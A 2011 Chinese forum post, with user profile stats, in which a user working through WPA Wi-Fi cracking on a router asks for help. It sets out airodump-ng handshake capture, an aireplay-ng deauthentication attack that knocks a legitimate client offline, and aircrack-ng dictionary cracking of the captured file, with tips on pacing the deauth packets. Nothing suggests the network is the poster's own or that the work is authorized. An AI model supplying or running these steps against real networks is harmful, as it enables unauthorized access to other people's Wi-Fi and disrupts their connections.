中校
- 注册时间
- 2011-1-10
- 金币
- 5445 个
- 威望
- 6 个
- 荣誉
- 0 个
累计签到:242 天 连续签到:0 天 [LV.365]无线熟人
|
本帖最后由 cw7304372 于 2011-12-18 16:16 编辑
回复 1# qq121047664
到wpa了
新建PUTTY,
输入:screen
airodump-ng -c (信道) --bssid (AP Mac) -w /mnt/sda1/output mon0(抓cap包放在U盘,U盘直接插上路由系统会自动加载)
前面的按你说的设置了 这下面的要怎么弄 ?
我新开一个PUTTY ---screen--aireplay-ng -0 1 -a (AP Mac) -c (合法的客户端的MAC) mon0
没反应啊 接下来不知道怎么做 求教{:3_46:}{:3_46:}
aireplay-ng -0 1 -a (AP Mac) -c (合法的客户端) mon0往已经连接到ap的一个客户端伪造一个离线包,使其离线重连以便捕捉handshake.注意要收到ACK,才表明被攻击客户端收到,才会下线;发送离线不宜过密过多。
监听捕捉另外一客户端与ap之间的连接,上方出现WPA handshake: xx:xx:xx:xx........为成功获得握手包也可以使用发下命令来测试是否有握手包,
aircrack-ng -w /mnt/sda1/password.TXT -b AP Mac
/mnt/sda1/
output*.cap (
password.TXT是字典) 下载 (38.14 KB)
2011-11-18 21:14
|
|